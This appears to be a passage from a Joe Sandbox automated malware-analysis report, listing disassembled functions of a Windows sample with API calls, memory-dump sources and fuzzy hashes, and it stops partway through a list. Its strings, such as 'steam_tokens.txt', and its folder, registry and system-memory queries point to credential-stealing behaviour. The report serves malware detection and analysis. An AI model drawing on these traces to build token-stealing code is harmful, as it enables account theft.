                            Function 006EE9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006EEA24
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EEA53
                            • lstrcat.KERNEL32(?,00000000), ref: 006EEA61
                            • lstrcat.KERNEL32(?,00701794), ref: 006EEA7A
                            • lstrcat.KERNEL32(?,010189B8), ref: 006EEA8D
                            • lstrcat.KERNEL32(?,00701794), ref: 006EEA9F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: d6099ddb93b93b41cfdae8b4d50235c16acda39881fe1f3b4c611c8986aae7d1
                            • Instruction ID: 322335c9c31c904ddb052f377b5f895759967fe4bf9bdd666987401b397a7afb
                            • Opcode Fuzzy Hash: d6099ddb93b93b41cfdae8b4d50235c16acda39881fe1f3b4c611c8986aae7d1
                            • Instruction Fuzzy Hash: 6341C3B1E20119AFCB61EB64DC42FEE73B9FF58300F004469BA1A97381DA709E449B94
                            Function 006EECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EECDF
                            • lstrlen.KERNEL32(00000000), ref: 006EECF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EED1D
                            • lstrlen.KERNEL32(00000000), ref: 006EED24
                            • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 006EED52
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: steam_tokens.txt
                            • API String ID: 367037083-401951677
                            • Opcode ID: 14f79f7ecdcc63a162ac6831e7fbe151640c0be58386c2e2e69a721533d8cabe
                            • Instruction ID: 23ff443682aded22c82a7199bf13447ffef21e226dd95265bf957f4e5a3fc0ff
                            • Opcode Fuzzy Hash: 14f79f7ecdcc63a162ac6831e7fbe151640c0be58386c2e2e69a721533d8cabe
                            • Instruction Fuzzy Hash: 5A31E3B1E112565BC771BB7AEC1AAAE77A7EF20700F085129F806DB312DB24DC0587C8
                            Function 006D9A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,006D140E), ref: 006D9A9A
                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,006D140E), ref: 006D9AB0
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,006D140E), ref: 006D9AC7
                            • ReadFile.KERNEL32(00000000,00000000,?,006D140E,00000000,?,?,?,006D140E), ref: 006D9AE0
                            • LocalFree.KERNEL32(?,?,?,?,006D140E), ref: 006D9B00
                            • CloseHandle.KERNEL32(00000000,?,?,?,006D140E), ref: 006D9B07
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: e71343e77c7e58f6c3667cd93b6cd8174140e7a2b80204dba985c5cc744b83a8
                            • Instruction ID: 6d35b78ac2caab30b82a98bd1a21524ec57444011ad619e057d640c8957334f0
                            • Opcode Fuzzy Hash: e71343e77c7e58f6c3667cd93b6cd8174140e7a2b80204dba985c5cc744b83a8
                            • Instruction Fuzzy Hash: 1A115E71A1420AAFE710DFAADD89AAB737DEF05744F10425AF90596380EB709D00CBB0
                            Function 006F5AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006F5B14
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA188
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA1AE
                            • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 006F5B7C
                            • memmove.MSVCRT(00000000,?,?), ref: 006F5B89
                            • memmove.MSVCRT(00000000,?,?), ref: 006F5B98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long
                            • API String ID: 2052693487-3788999226
                            • Opcode ID: 82042bf0d543eb0c5dd16d66ce3ac50130c98300b528b2ed091e565b5fdabaa5
                            • Instruction ID: 74a8599fa03377a854c080960711bd9bb0e66692fe9bce3a856edd379cab1d2b
                            • Opcode Fuzzy Hash: 82042bf0d543eb0c5dd16d66ce3ac50130c98300b528b2ed091e565b5fdabaa5
                            • Instruction Fuzzy Hash: 0C4153B1B005199FCF04DF6CC995ABEB7E6EB89310F158269EA1AE7744D6309D018B90
                            Function 006E7D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006E7D58
                              • Part of subcall function 006FA1C0: std::exception::exception.LIBCMT ref: 006FA1D5
                              • Part of subcall function 006FA1C0: std::exception::exception.LIBCMT ref: 006FA1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 006E7D76
                            • std::_Xinvalid_argument.LIBCPMT ref: 006E7D91
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$std::exception::exception
                            • String ID: invalid string position$string too long
                            • API String ID: 3310641104-4289949731
                            • Opcode ID: e181a5ac46fbbf754963b632dfef18cf8c9c3918aa272a75e131030279b5fef1
                            • Instruction ID: f84b2e97f4fcc9daac4460d4a387c245086fbf63b1ac8922510176f2f6b4ae74
                            • Opcode Fuzzy Hash: e181a5ac46fbbf754963b632dfef18cf8c9c3918aa272a75e131030279b5fef1
                            • Instruction Fuzzy Hash: F221E1723093448BD720DE6DEC80A7AF7E6EFA1720B204A6EE546CB381D770DC0487A5
                            Function 006F33C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006F33EF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F33F6
                            • GlobalMemoryStatusEx.KERNEL32 ref: 006F3411
                            • wsprintfA.USER32 ref: 006F3437
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB
                            • API String ID: 2922868504-2651807785
                            • Opcode ID: 6b539f99a2b62aa219c4b545d36f2c5bde4babb575bac4dca8d5cf9c50e527b5
                            • Instruction ID: 3223c30b3b41568addfb225d8bf0d4e12a828fde57bed51dbc21ea3ba403ba4f
                            • Opcode Fuzzy Hash: 6b539f99a2b62aa219c4b545d36f2c5bde4babb575bac4dca8d5cf9c50e527b5
                            • Instruction Fuzzy Hash: 8E01D4B1B18218AFDB04DFA8DD49BBEB7BDFB45710F004229FA06E7380D774990086A5
                            Function 006ED7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,0101E6B8,00000000,00020119,?), ref: 006ED7F5
                            • RegQueryValueExA.ADVAPI32(?,0101F238,00000000,00000000,00000000,000000FF), ref: 006ED819
                            • RegCloseKey.ADVAPI32(?), ref: 006ED823
                            • lstrcat.KERNEL32(?,00000000), ref: 006ED848
                            • lstrcat.KERNEL32(?,0101F250), ref: 006ED85C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: 7eb03415b8a988124341e61db3ac1fd28012cd7400d2a60ab26708cd328bdbfb
                            • Instruction ID: be4de4ea234b8f29c4d2cbef5cc0d5df8973741425158a8989b83821d0c3bb8e
                            • Opcode Fuzzy Hash: 7eb03415b8a988124341e61db3ac1fd28012cd7400d2a60ab26708cd328bdbfb
                            • Instruction Fuzzy Hash: 0241B2B1A2020DAFCB94EF64EC86BDE7779EF54300F008069B54997351EE30AA85CF94
                            Function 006E7EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 006E7F31
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E7F60
                            • StrCmpCA.SHLWAPI(00000000,00704C3C), ref: 006E7FA5
                            • StrCmpCA.SHLWAPI(00000000,00704C3C), ref: 006E7FD3
                            • StrCmpCA.SHLWAPI(00000000,00704C3C), ref: 006E8007
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 22e27b1e2165003bc439c2ad2beb68169ea563dd756d4b60b590a9eecb8ce514
                            • Instruction ID: f71b265a898c093b56af4540987894f34f47836ef5e06b751b860eb762f1b7ed
                            • Opcode Fuzzy Hash: 22e27b1e2165003bc439c2ad2beb68169ea563dd756d4b60b590a9eecb8ce514
                            • Instruction Fuzzy Hash: E641A170A0921ADFDB20DF69D480EAEB7B5FF54300B114199E809DB351DB70EA66CB91
                            Function 006E8050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 006E80BB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E80EA
                            • StrCmpCA.SHLWAPI(00000000,00704C3C), ref: 006E8102
                            • lstrlen.KERNEL32(00000000), ref: 006E8140
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E816F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 6e5c5f5cedf50bef8c81d7bb50c78c5124ebd284e52aa6a6325a5736e303618b
                            • Instruction ID: ec5c12a396e0f3043f9ef174cda0c921182f7e1da8fef2768a9443b30a2d09a3
                            • Opcode Fuzzy Hash: 6e5c5f5cedf50bef8c81d7bb50c78c5124ebd284e52aa6a6325a5736e303618b
                            • Instruction Fuzzy Hash: CC417771A01246AFCB21DFBAD944BEABBF6EF44300F14845DA84997354EB34D946CB90
                            Function 006F1B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 006F1B72
                              • Part of subcall function 006F1820: lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F184F
                              • Part of subcall function 006F1820: lstrlen.KERNEL32(01006F30), ref: 006F1860
                              • Part of subcall function 006F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006F1887
                              • Part of subcall function 006F1820: lstrcat.KERNEL32(00000000,00000000), ref: 006F1892
                              • Part of subcall function 006F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006F18C1
                              • Part of subcall function 006F1820: lstrlen.KERNEL32(00704FA0), ref: 006F18D3
                              • Part of subcall function 006F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006F18F4
                              • Part of subcall function 006F1820: lstrcat.KERNEL32(00000000,00704FA0), ref: 006F1900
                              • Part of subcall function 006F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006F192F
                            • sscanf.NTDLL ref: 006F1B9A
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 006F1BB6
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 006F1BC6
                            • ExitProcess.KERNEL32 ref: 006F1BE3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
